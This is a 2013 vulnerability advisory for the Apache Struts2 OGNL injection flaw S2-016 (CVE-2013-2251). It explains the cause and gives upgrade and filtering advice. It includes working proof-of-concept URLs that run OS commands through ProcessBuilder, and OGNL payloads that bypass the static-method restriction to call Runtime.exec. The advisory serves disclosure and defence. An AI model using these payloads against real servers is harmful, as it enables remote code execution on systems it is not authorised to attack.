CVE Number: CVE-2013-2251 Title: Struts2 Prefixed Parameters OGNL Injection Vulnerability Affected Software: Apache Struts v2.0.0 - 2.3.15 Credit: Takeshi Terada of Mitsui Bussan Secure Directions, Inc. Issue Status: v2.3.15.1 was released which fixes this vulnerability Issue ID by Vender: S2-016 Overview: Struts2 is an open-source web application framework for Java. Struts2 (v2.0.0 - 2.3.15) is vulnerable to remote OGNL injection which leads to arbitrary Java method execution on the target server. This is caused by insecure handling of prefixed special parameters (action:, redirect: and redirectAction:) in DefaultActionMapper class of Struts2. Details: <About DefaultActionMapper> Struts2's ActionMapper is a mechanism for mapping between incoming HTTP request and action to be executed on the server. DefaultActionMapper is a default implementation of ActionMapper. It handles four types of prefixed parameters: action:, redirect:, redirectAction: and method:. For example, redirect prefix is used for HTTP redirect. Normal redirect prefix usage in JSP: <s:form action="foo"> ... <s:submit value="Register"/> <s:submit name="redirect:http://www.google.com/" value="Cancel"/> </s:form> If the cancel button is clicked, redirection is performed. Request URI for redirection: /foo.action?redirect:http://www.google.com/ Resopnse Header: HTTP/1.1 302 Found Location: http://www.google.com/ Usage of other prefixed parameters is similar to redirect. See Struts2 document for details. https://cwiki.apache.org/confluence/display/WW/ActionMapper <How the Attack Works> As stated already, there are four types of prefixed parameters. action:, redirect:, redirectAction:, method: All except for method: can be used for attacks. But regarding action:, it can be used only if wildcard mapping is enabled in configuration. On the one hand, redirect: and redirectAction: are not constrained by configuration (thus they are convenient for attackers). One thing that should be noted is that prefixed parameters are quite forceful. It means that behavior of application which is not intended to accept prefixed parameters can also be overwritten by prefixed parameters added to HTTP request. Therefore all Struts2 applications that use DefaultActionMapper are vulnerable to the attack. The injection point is name of prefixed parameters. Example of attack using redirect: is shown below. Attack URI: /bar.action?redirect:http://www.google.com/%25{1000-1} Response Header: HTTP/1.1 302 Found Location: http://www.google.com/999 As you can see, expression (1000-1) is evaluated and the result (999) is appeared in Location response header. As I shall explain later, more complex attacks such as OS command execution is possible too. In DefaultActionMapper, name of prefixed parameter is once stored as ActionMapping object and is later executed as OGNL expression. Rough method call flow in execution phase is as the following. org.apache.struts2.dispatcher.ng.filter.StrutsExecuteFilter.doFilter() org.apache.struts2.dispatcher.ng.ExecuteOperations.executeAction() org.apache.struts2.dispatcher.Dispatcher.serviceAction() org.apache.struts2.dispatcher.StrutsResultSupport.execute() org.apache.struts2.dispatcher.StrutsResultSupport.conditionalParse() com.opensymphony.xwork2.util.TextParseUtil.translateVariables() com.opensymphony.xwork2.util.OgnlTextParser.evaluate() Proof of Concept: <PoC URLs> PoC is already disclosed on vender's web page. https://struts.apache.org/release/2.3.x/docs/s2-016.html Below PoC URLs are just quotes from the vender's page. Simple Expression: http://host/struts2-blank/example/X.action?action:%25{3*4} http://host/struts2-showcase/employee/save.action?redirect:%25{3*4} OS Command Execution: http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()} http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()} http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()} Obviously such attacks are not specific to blank/showcase application, but all Struts2 based applications may be subject to attacks. <OS Command Execution and Static Method Call> Another topic that I think worth mentioning is that PoC URLs use ProcessBuilder class to execute OS commands. The merit of using this class is that it does not require static method to execute OS commands, while Runtime class does require it. As you may know, static method call in OGNL is basically prohibited. But in Struts2 <= v2.3.14.1 this restriction was easily bypassed by a simple trick: %{#_memberAccess['allowStaticMethodAccess']=true, @java.lang.Runtime@getRuntime().exec('your commands')} In Struts v2.3.14.2, SecurityMemberAccess class has been changed to prevent the trick. However there are still some techniques to call static method in OGNL. One technique is to use reflection to replace static method call to instance method call. Another technique is to overwrite #_memberAccess object itself rather than property of the object: %{#_memberAccess=new com.opensymphony.xwork2.ognl.SecurityMemberAccess(true), @java.lang.Runtime@getRuntime().exec('your commands')} Probably prevention against static method is just an additional layer of defense, but I think that global objects such as #_memberAccess should be protected from rogue update. Timeline: 2013/06/24 Reported to Struts Security ML 2013/07/17 Vender announced v2.3.15.1 2013/08/10 Disclosure of this advisory Recommendation: Immediate upgrade to the latest version is strongly recommended as active attacks have already been observed. It should be noted that redirect: and redirectAction: parameters were completely dropped and do not work in the latest version as stated in the vender's page. Thus attention for compatibility issues is required for upgrade. If you cannot upgrade your Struts2 immediately, filtering (by custom servlet filter, IPS, WAF and so on) can be a mitigation solution for this vulnerability. Some points about filtering solution are listed below. - Both %{expr} and ${expr} notation can be used for attacks. - Parameters both in querystring and in request body can be used. - redirect: and redirectAction: can be used not only for Java method execution but also for open redirect. See S2-017 (CVE-2013-2248) for open redirect issue. https://struts.apache.org/release/2.3.x/docs/s2-017.html Reference: https://struts.apache.org/release/2.3.x/docs/s2-016.html https://cwiki.apache.org/confluence/display/WW/ActionMapper